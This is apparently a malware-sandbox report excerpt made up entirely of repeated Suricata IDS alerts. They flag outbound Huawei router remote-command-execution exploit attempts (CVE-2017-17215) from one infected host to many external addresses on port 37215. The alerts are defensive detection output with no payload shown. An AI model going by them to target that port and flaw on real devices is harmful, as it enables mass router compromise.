              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60810 -> 197.159.98.47:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35516 -> 156.2.214.195:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38498 -> 156.99.87.12:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34190 -> 197.52.78.211:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47700 -> 197.171.51.50:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53030 -> 197.8.61.210:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54792 -> 156.232.85.224:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57058 -> 156.114.31.179:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34366 -> 156.224.53.126:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40540 -> 156.160.14.249:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46004 -> 156.226.33.116:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32784 -> 156.222.164.152:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48042 -> 197.232.92.202:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55388 -> 197.214.233.234:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42546 -> 156.154.242.200:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43968 -> 197.6.168.40:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57482 -> 197.97.238.179:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42670 -> 197.146.39.49:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36612 -> 197.82.210.201:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55158 -> 197.214.159.206:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33326 -> 197.232.206.232:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60228 -> 197.230.7.29:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43990 -> 197.93.192.152:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48182 -> 197.116.59.170:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:32836 -> 197.239.219.107:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36878 -> 197.211.197.171:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39730 -> 197.220.94.58:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47442 -> 197.188.219.167:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56800 -> 197.178.54.120:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52824 -> 197.51.150.222:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56832 -> 197.225.41.153:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36806 -> 197.248.211.233:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45668 -> 197.0.66.255:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53216 -> 197.210.231.121:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50862 -> 197.201.150.43:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34760 -> 197.161.217.36:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58198 -> 197.103.57.18:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45228 -> 197.31.2.107:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39676 -> 197.158.63.35:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49250 -> 197.17.109.68:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39632 -> 197.60.9.151:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51160 -> 197.228.101.62:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60378 -> 197.196.146.127:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35470 -> 197.129.60.194:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35754 -> 197.91.147.54:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43028 -> 197.32.210.187:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58088 -> 197.24.118.179:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33082 -> 197.2.193.202:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60714 -> 197.202.144.3:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38208 -> 197.36.25.162:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34260 -> 197.229.187.157:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49318 -> 197.246.115.20:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33490 -> 197.169.135.160:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42172 -> 197.69.70.246:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49118 -> 197.255.125.54:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40174 -> 197.106.49.130:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51234 -> 197.146.72.185:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35516 -> 197.62.104.9:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45978 -> 197.13.126.210:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46352 -> 197.119.207.203:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58018 -> 197.46.123.107:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51218 -> 197.151.135.113:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58432 -> 197.173.16.180:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45682 -> 197.233.160.236:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37296 -> 197.32.224.239:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:38018 -> 197.146.70.250:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34310 -> 197.95.233.251:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45648 -> 197.66.254.58:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59016 -> 197.45.43.114:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34380 -> 197.158.6.210:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58264 -> 197.173.97.59:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33586 -> 197.51.157.219:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45370 -> 197.96.41.54:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59582 -> 197.1.111.96:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58652 -> 197.148.102.142:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53214 -> 197.154.116.110:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42312 -> 197.24.164.146:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54866 -> 197.95.31.11:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45410 -> 197.38.134.76:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45728 -> 197.54.104.209:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57652 -> 197.23.60.82:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59566 -> 197.137.36.189:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:56856 -> 197.109.217.96:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49524 -> 197.3.49.225:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47694 -> 197.152.24.1:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47386 -> 197.119.115.160:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37440 -> 197.168.248.210:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46846 -> 197.141.73.254:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55342 -> 197.38.27.96:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60622 -> 197.124.18.218:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:46122 -> 197.64.54.240:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:39500 -> 197.41.17.127:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33918 -> 197.1.90.105:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53972 -> 197.190.135.125:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49894 -> 197.228.54.111:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:57106 -> 197.71.201.134:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33050 -> 197.60.222.227:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47440 -> 197.65.21.242:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:35446 -> 197.23.120.198:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51320 -> 197.179.202.34:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42028 -> 197.28.102.17:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49488 -> 197.252.127.245:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52034 -> 197.50.74.142:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:45228 -> 197.190.79.43:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:48376 -> 197.105.79.113:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49260 -> 197.226.25.204:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52066 -> 197.208.89.135:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51702 -> 197.54.167.227:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33646 -> 197.99.226.201:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42750 -> 197.125.149.114:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37954 -> 197.182.130.96:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54710 -> 197.17.180.178:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51014 -> 197.191.247.26:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:60468 -> 197.169.87.71:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54184 -> 197.65.7.249:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52360 -> 197.173.102.167:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49508 -> 197.96.248.150:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:51502 -> 197.192.203.212:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43486 -> 197.129.103.136:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41086 -> 197.250.68.253:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54314 -> 156.61.148.110:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55472 -> 197.249.213.212:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:50466 -> 197.23.40.225:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33492 -> 197.227.201.137:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41414 -> 197.65.90.121:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47198 -> 197.159.119.111:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36204 -> 197.185.187.106:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47562 -> 197.33.17.103:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34130 -> 197.140.140.62:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41492 -> 197.37.120.243:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41156 -> 197.2.166.64:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:34530 -> 197.255.220.233:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:43892 -> 197.164.217.237:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54686 -> 197.96.54.179:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55058 -> 197.4.208.115:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:53156 -> 197.156.71.0:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:55638 -> 197.79.94.70:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:40270 -> 197.215.60.199:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33784 -> 156.212.150.82:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:59914 -> 197.248.179.68:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42550 -> 197.147.55.36:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:37302 -> 156.16.202.229:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52000 -> 156.79.230.237:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42842 -> 197.239.18.162:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:42072 -> 197.139.246.121:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49692 -> 197.244.2.159:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:52174 -> 156.112.199.226:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:49464 -> 156.134.130.68:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:58008 -> 156.96.170.16:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:41296 -> 197.202.237.142:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:36928 -> 197.182.175.35:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:33512 -> 156.184.247.234:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:54872 -> 197.207.149.115:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.14:47614 -> 197.21.174.108:37215
